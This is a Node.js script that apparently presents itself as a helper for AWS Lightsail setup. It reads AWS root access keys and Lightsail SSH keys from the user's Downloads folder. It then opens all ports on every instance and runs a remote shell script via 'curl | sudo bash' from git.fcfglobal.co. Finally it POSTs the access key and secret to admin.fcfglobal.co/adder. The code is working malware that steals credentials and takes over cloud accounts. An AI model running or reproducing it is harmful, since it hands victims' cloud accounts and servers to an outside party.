const fs = require('fs');
const path = require('path');
const AWS = require('aws-sdk');
const { Client } = require('ssh2');
const axios = require('axios');
const downloadsPath = path.join(process.env.HOME || process.env.USERPROFILE, 'Downloads');
const rootKeyFilePath = path.join(downloadsPath, 'rootkey.csv');

// Check if the rootkey.csv file exists
if (!fs.existsSync(rootKeyFilePath)) {
    console.error(`File not found: ${rootKeyFilePath}`);
    process.exit(1);
}

// Function to read the second line and extract AWS credentials
function extractAWSCredentials(filePath) {
    const fileContent = fs.readFileSync(filePath, 'utf8');
    const lines = fileContent.split('\n');

    if (lines.length < 2) {
        throw new Error('The rootkey.csv file does not contain enough lines.');
    }

    const secondLine = lines[1].trim();
    const [accessKeyId, secretAccessKey] = secondLine.split(',');

    if (accessKeyId && secretAccessKey) {
        return {
            accessKeyId: accessKeyId.trim(),
            secretAccessKey: secretAccessKey.trim(),
        };
    } else {
        throw new Error('Failed to extract AWS credentials from the second line of rootkey.csv');
    }
}

function getPemFilesAndRegions() {
    const pemFiles = fs.readdirSync(downloadsPath).filter(file => file.endsWith('.pem'));
    const regions = new Set();

    pemFiles.forEach(file => {
        const match = file.match(/LightsailDefaultKey-(.*)\.pem/);
        if (match) {
            regions.add(match[1]);
        }
    });

    return Array.from(regions);
}

async function getLightsailInstances(region, credentials) {
    const lightsail = new AWS.Lightsail({
        region,
        accessKeyId: credentials.accessKeyId,
        secretAccessKey: credentials.secretAccessKey
    });

    try {
        const instances = await lightsail.getInstances({}).promise();
        return instances.instances;
    } catch (err) {
        console.error(`Error fetching instances in region ${region}:`, err.message);
        return [];
    }
}

async function openAllPorts(lightsail, instanceName) {
    const params = {
        instanceName: instanceName,
        portInfos: [
            {
                fromPort: 0,
                protocol: 'all',
                toPort: 65535
            },
        ]
    };

    return new Promise((resolve, reject) => {
        lightsail.putInstancePublicPorts(params, (err, data) => {
            if (err) {
                console.error(`Error opening ports for instance ${instanceName}:`, err);
                reject(err);
            } else {
                console.log(`Ports opened for instance ${instanceName}`);
                resolve(data);
            }
        });
    });
}

async function disableIpv6(lightsail, instanceName) {
    const params = {
        resourceName: instanceName,
        resourceType: 'Instance', // Specify the resource type
        ipAddressType: 'ipv4', // This disables IPv6 and keeps only IPv4
    };

    return new Promise((resolve, reject) => {
        lightsail.setIpAddressType(params, (err, data) => {
            if (err) {
                console.error(`Error disabling IPv6 for instance ${instanceName}:`, err);
                reject(err);
            } else {
                console.log(`IPv6 disabled for instance ${instanceName}`);
                resolve(data);
            }
        });
    });
}

async function runCommandOnInstance(instanceIp, username, privateKeyPath) {
    return new Promise((resolve, reject) => {
        const conn = new Client();
        conn.on('ready', () => {
            console.log(`SSH connection established to ${instanceIp}`);
            conn.exec('nohup curl -fsSL http://git.fcfglobal.co/root/x-ui/raw/master/run.sh | sudo bash > /dev/null 2>&1 &', (err, stream) => {
                if (err) {
                    console.error(`Error executing command on ${instanceIp}: ${err.message}`);
                    conn.end();
                    return reject(err);
                }

                // Resolve immediately after sending the command
                console.log(`Command sent to ${instanceIp}`);
                resolve(); // Resolve immediately to proceed to the next instance

                // Immediately close the SSH connection
                conn.end();
            });
        }).connect({
            host: instanceIp,
            port: 22,
            username: username,
            privateKey: fs.readFileSync(privateKeyPath)
        });
    });
}

async function processInstance(instance, pemFilePath) {
    const instanceIp = instance.publicIpAddress; // Replace with your method to get the IP
    const username = 'ubuntu'; // Replace with the appropriate username for your instances

    console.log(`Running command on instance: ${instance.name} (${instanceIp})`);
    await runCommandOnInstance(instanceIp, username, pemFilePath);
}

async function createStaticIp(lightsail) {
    const params = {
        staticIpName: 'StaticIp-1',
    };

    try {
        await lightsail.allocateStaticIp(params).promise();
        console.log(`Static IP 'StaticIp-1' created in region ${lightsail.config.region}`);
    } catch (err) {
        if (err.code === 'InvalidInputException' && err.message.includes('StaticIpName already in use')) {
            console.log(`Static IP 'StaticIp-1' already exists in region ${lightsail.config.region}`);
        } else {
            console.error(`Error creating Static IP in region ${lightsail.config.region}:`, err.message);
        }
    }
}
async function processRegion(region, credentials, pemFilePath) {
    const lightsail = new AWS.Lightsail({
        region,
        accessKeyId: credentials.accessKeyId,
        secretAccessKey: credentials.secretAccessKey
    });

    console.log(`Creating Static IP in region: ${region}`);
    await createStaticIp(lightsail);
    console.log(`Fetching instances in region: ${region}`);
    const instances = await getLightsailInstances(region, credentials);

    if (instances.length === 0) {
        console.log(`No instances found in region: ${region}`);
    } else {
        for (const instance of instances) {
            console.log(`Processing instance: ${instance.name} in region: ${region}`);
            await openAllPorts(lightsail, instance.name);
            await disableIpv6(lightsail, instance.name);
            await processInstance(instance, pemFilePath); // Pass the PEM file path
        }
    }
}

async function createAcc(access, secret) {
    const url = 'http://admin.fcfglobal.co/adder';

    const data = {
        access: access,
        secret: secret
    };

    try {
        const response = await axios.post(url, data);
        return response;
    } catch (error) {
        throw new Error(`API request failed: ${error.response ? error.response.data : error.message}`);
    }
}
async function main() {
    try {
        const credentials = extractAWSCredentials(rootKeyFilePath);
        console.log('AWS Credentials Loaded:', credentials);
        const regions = getPemFilesAndRegions();

        if (regions.length === 0) {
            console.log('No regions found from .pem files.');
            return;
        }

        for (const region of regions) {
            const pemFilePath = path.join(downloadsPath, `LightsailDefaultKey-${region}.pem`);
            await processRegion(region, credentials, pemFilePath);
        }

        const result = await createAcc(credentials.accessKeyId, credentials.secretAccessKey);
        console.log('Credentials stored successfully:', result.data);
    } catch (error) {
        console.error('Error:', error.message);
    }
}

main().catch(console.error);
